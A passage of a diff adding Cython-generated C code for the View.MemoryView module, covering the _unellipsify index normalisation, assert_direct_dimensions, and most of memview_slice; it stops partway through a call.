__Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = 0; + __pyx_t_6 = 127; + __Pyx_INCREF(__pyx_kp_u_Cannot_index_with_type); + __pyx_t_5 += 24; + __Pyx_GIVEREF(__pyx_kp_u_Cannot_index_with_type); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Cannot_index_with_type); + __pyx_t_7 = __Pyx_PyObject_FormatSimple(((PyObject *)Py_TYPE(__pyx_v_item)), __pyx_empty_unicode); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __Pyx_INCREF(__pyx_kp_u__6); + __pyx_t_5 += 1; + __Pyx_GIVEREF(__pyx_kp_u__6); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__6); + __pyx_t_7 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_5, __pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_t_7, 0, 0); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __PYX_ERR(1, 693, __pyx_L1_error) + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + } + __pyx_L7:; + + /* "View.MemoryView":694 + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item # <<<<<<<<<<<<<< + * idx += 1 + * + */ + if (unlikely((__Pyx_SetItemInt(__pyx_v_result, __pyx_v_idx, __pyx_v_item, Py_ssize_t, 1, PyInt_FromSsize_t, 1, 1, 1) < 0))) __PYX_ERR(1, 694, __pyx_L1_error) + } + __pyx_L5:; + + /* "View.MemoryView":695 + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + * idx += 1 # <<<<<<<<<<<<<< + * + * nslices = ndim - idx + */ + __pyx_v_idx = (__pyx_v_idx + 1); + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":697 + * idx += 1 + * + * nslices = ndim - idx # <<<<<<<<<<<<<< + * return have_slices or nslices, tuple(result) + * + */ + __pyx_v_nslices = (__pyx_v_ndim - __pyx_v_idx); + + /* "View.MemoryView":698 + * + * nslices = ndim - idx + * return have_slices or nslices, tuple(result) # <<<<<<<<<<<<<< + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + */ + __Pyx_XDECREF(__pyx_r); + if (!__pyx_v_have_slices) { + } else { + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_have_slices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_7 = PyInt_FromSsize_t(__pyx_v_nslices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + __pyx_L9_bool_binop_done:; + __pyx_t_7 = PyList_AsTuple(__pyx_v_result); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_7 = 0; + __pyx_r = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView._unellipsify", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_tup); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + +static int assert_direct_dimensions(Py_ssize_t *__pyx_v_suboffsets, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_suboffset; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assert_direct_dimensions", 0); + + /* "View.MemoryView":701 + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + */ + __pyx_t_2 = (__pyx_v_suboffsets + __pyx_v_ndim); + for (__pyx_t_3 = __pyx_v_suboffsets; __pyx_t_3 < __pyx_t_2; __pyx_t_3++) { + __pyx_t_1 = __pyx_t_3; + __pyx_v_suboffset = (__pyx_t_1[0]); + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + __pyx_t_4 = (__pyx_v_suboffset >= 0); + if (unlikely(__pyx_t_4)) { + + /* "View.MemoryView":703 + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" # <<<<<<<<<<<<<< + * return 0 # return type just used as an error flag + * + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Indirect_dimensions_not_supporte, 0, 0); + __PYX_ERR(1, 703, __pyx_L1_error) + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + } + } + + /* "View.MemoryView":704 + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.assert_direct_dimensions", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *__pyx_v_memview, PyObject *__pyx_v_indices) { + int __pyx_v_new_ndim; + int __pyx_v_suboffset_dim; + int __pyx_v_dim; + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + __Pyx_memviewslice *__pyx_v_p_src; + struct __pyx_memoryviewslice_obj *__pyx_v_memviewsliceobj = 0; + __Pyx_memviewslice *__pyx_v_p_dst; + int *__pyx_v_p_suboffset_dim; + Py_ssize_t __pyx_v_start; + Py_ssize_t __pyx_v_stop; + Py_ssize_t __pyx_v_step; + Py_ssize_t __pyx_v_cindex; + int __pyx_v_have_start; + int __pyx_v_have_stop; + int __pyx_v_have_step; + PyObject *__pyx_v_index = NULL; + struct __pyx_memoryview_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + struct __pyx_memoryview_obj *__pyx_t_3; + char *__pyx_t_4; + int __pyx_t_5; + Py_ssize_t __pyx_t_6; + PyObject *(*__pyx_t_7)(PyObject *); + PyObject *__pyx_t_8 = NULL; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + Py_ssize_t __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memview_slice", 0); + + /* "View.MemoryView":712 + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): + * cdef int new_ndim = 0, suboffset_dim = -1, dim # <<<<<<<<<<<<<< + * cdef bint negative_step + * cdef __Pyx_memviewslice src, dst + */ + __pyx_v_new_ndim = 0; + __pyx_v_suboffset_dim = -1; + + /* "View.MemoryView":719 + * + * + * memset(&dst, 0, sizeof(dst)) # <<<<<<<<<<<<<< + * + * cdef _memoryviewslice memviewsliceobj + */ + (void)(memset((&__pyx_v_dst), 0, (sizeof(__pyx_v_dst)))); + + /* "View.MemoryView":723 + * cdef _memoryviewslice memviewsliceobj + * + * assert memview.view.ndim > 0 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_memview->view.ndim > 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 723, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 723, __pyx_L1_error) + #endif + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":726 + * + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview # <<<<<<<<<<<<<< + * p_src = &memviewsliceobj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 726, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_memviewsliceobj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":727 + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, &src) + */ + __pyx_v_p_src = (&__pyx_v_memviewsliceobj->from_slice); + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + goto __pyx_L3; + } + + /* "View.MemoryView":729 + * p_src = &memviewsliceobj.from_slice + * else: + * slice_copy(memview, &src) # <<<<<<<<<<<<<< + * p_src = &src + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_src)); + + /* "View.MemoryView":730 + * else: + * slice_copy(memview, &src) + * p_src = &src # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_p_src = (&__pyx_v_src); + } + __pyx_L3:; + + /* "View.MemoryView":736 + * + * + * dst.memview = p_src.memview # <<<<<<<<<<<<<< + * dst.data = p_src.data + * + */ + __pyx_t_3 = __pyx_v_p_src->memview; + __pyx_v_dst.memview = __pyx_t_3; + + /* "View.MemoryView":737 + * + * dst.memview = p_src.memview + * dst.data = p_src.data # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_v_p_src->data; + __pyx_v_dst.data = __pyx_t_4; + + /* "View.MemoryView":742 + * + * + * cdef __Pyx_memviewslice *p_dst = &dst # <<<<<<<<<<<<<< + * cdef int *p_suboffset_dim = &suboffset_dim + * cdef Py_ssize_t start, stop, step, cindex + */ + __pyx_v_p_dst = (&__pyx_v_dst); + + /* "View.MemoryView":743 + * + * cdef __Pyx_memviewslice *p_dst = &dst + * cdef int *p_suboffset_dim = &suboffset_dim # <<<<<<<<<<<<<< + * cdef Py_ssize_t start, stop, step, cindex + * cdef bint have_start, have_stop, have_step + */ + __pyx_v_p_suboffset_dim = (&__pyx_v_suboffset_dim); + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + __pyx_t_5 = 0; + if (likely(PyList_CheckExact(__pyx_v_indices)) || PyTuple_CheckExact(__pyx_v_indices)) { + __pyx_t_2 = __pyx_v_indices; __Pyx_INCREF(__pyx_t_2); __pyx_t_6 = 0; + __pyx_t_7 = NULL; + } else { + __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_indices); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 747, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_7)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_6 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } else { + if (__pyx_t_6 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } + } else { + __pyx_t_8 = __pyx_t_7(__pyx_t_2); + if (unlikely(!__pyx_t_8)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 747, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_8); + } + __Pyx_XDECREF_SET(__pyx_v_index, __pyx_t_8); + __pyx_t_8 = 0; + __pyx_v_dim = __pyx_t_5; + __pyx_t_5 = (__pyx_t_5 + 1); + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + __pyx_t_1 = (PyIndex_Check(__pyx_v_index) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":749 + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): + * cindex = index # <<<<<<<<<<<<<< + * slice_memviewslice( + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + */ + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_v_index); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 749, __pyx_L1_error) + __pyx_v_cindex = __pyx_t_9; + + /* "View.MemoryView":750 + * if PyIndex_Check(index): + * cindex = index + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_cindex, 0, 0, 0, 0, 0, 0); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 750, __pyx_L1_error) + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + goto __pyx_L6; + } + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + __pyx_t_1 = (__pyx_v_index == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":757 + * False) + * elif index is None: + * p_dst.shape[new_ndim] = 1 # <<<<<<<<<<<<<< + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + */ + (__pyx_v_p_dst->shape[__pyx_v_new_ndim]) = 1; + + /* "View.MemoryView":758 + * elif index is None: + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 # <<<<<<<<<<<<<< + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 + */ + (__pyx_v_p_dst->strides[__pyx_v_new_ndim]) = 0; + + /* "View.MemoryView":759 + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 # <<<<<<<<<<<<<< + * new_ndim += 1 + * else: + */ + (__pyx_v_p_dst->suboffsets[__pyx_v_new_ndim]) = -1L; + + /* "View.MemoryView":760 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 # <<<<<<<<<<<<<< + * else: + * start = index.start or 0 + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + goto __pyx_L6; + } + + /* "View.MemoryView":762 + * new_ndim += 1 + * else: + * start = index.start or 0 # <<<<<<<<<<<<<< + * stop = index.stop or 0 + * step = index.step or 0 + */ + /*else*/ { + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 762, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 762, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 762, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L7_bool_binop_done:; + __pyx_v_start = __pyx_t_9; + + /* "View.MemoryView":763 + * else: + * start = index.start or 0 + * stop = index.stop or 0 # <<<<<<<<<<<<<< + * step = index.step or 0 + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 763, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 763, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 763, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L9_bool_binop_done:; + __pyx_v_stop = __pyx_t_9; + + /* "View.MemoryView":764 + * start = index.start or 0 + * stop = index.stop or 0 + * step = index.step or 0 # <<<<<<<<<<<<<< + * + * have_start = index.start is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 764, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 764, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 764, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L11_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L11_bool_binop_done:; + __pyx_v_step = __pyx_t_9; + + /* "View.MemoryView":766 + * step = index.step or 0 + * + * have_start = index.start is not None # <<<<<<<<<<<<<< + * have_stop = index.stop is not None + * have_step = index.step is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 766, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_start = __pyx_t_1; + + /* "View.MemoryView":767 + * + * have_start = index.start is not None + * have_stop = index.stop is not None # <<<<<<<<<<<<<< + * have_step = index.step is not None + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 767, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_stop = __pyx_t_1; + + /* "View.MemoryView":768 + * have_start = index.start is not None + * have_stop = index.stop is not None + * have_step = index.step is not None # <<<<<<<<<<<<<< + * + * slice_memviewslice( + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 768, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_step = __pyx_t_1; + + /* "View.MemoryView":770 + * have_step = index.step is not None + * + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_start, __pyx_v_stop, __pyx_v_step, __pyx_v_have_start, __pyx_v_have_stop, __pyx_v_have_step, 1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 770, __pyx_L1_error) + + /* "View.MemoryView":776 + * have_start, have_stop, have_step, + * True) + * new_ndim += 1 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + } + __pyx_L6:; + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":780 + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, # <<<<<<<<<<<<<< + * memviewsliceobj.to_dtype_func, + * memview.dtype_is_object) + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 780, __pyx_L1_error) } + + /* "View.MemoryView":781 + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * else: + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 781, __pyx_L1_error) } + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, __pyx_v_memviewsliceobj->to_object_func, __pyx_v_memviewsliceobj->to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 779, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 779, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + } + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + /*else*/ { + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":785 + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, NULL, NULL, 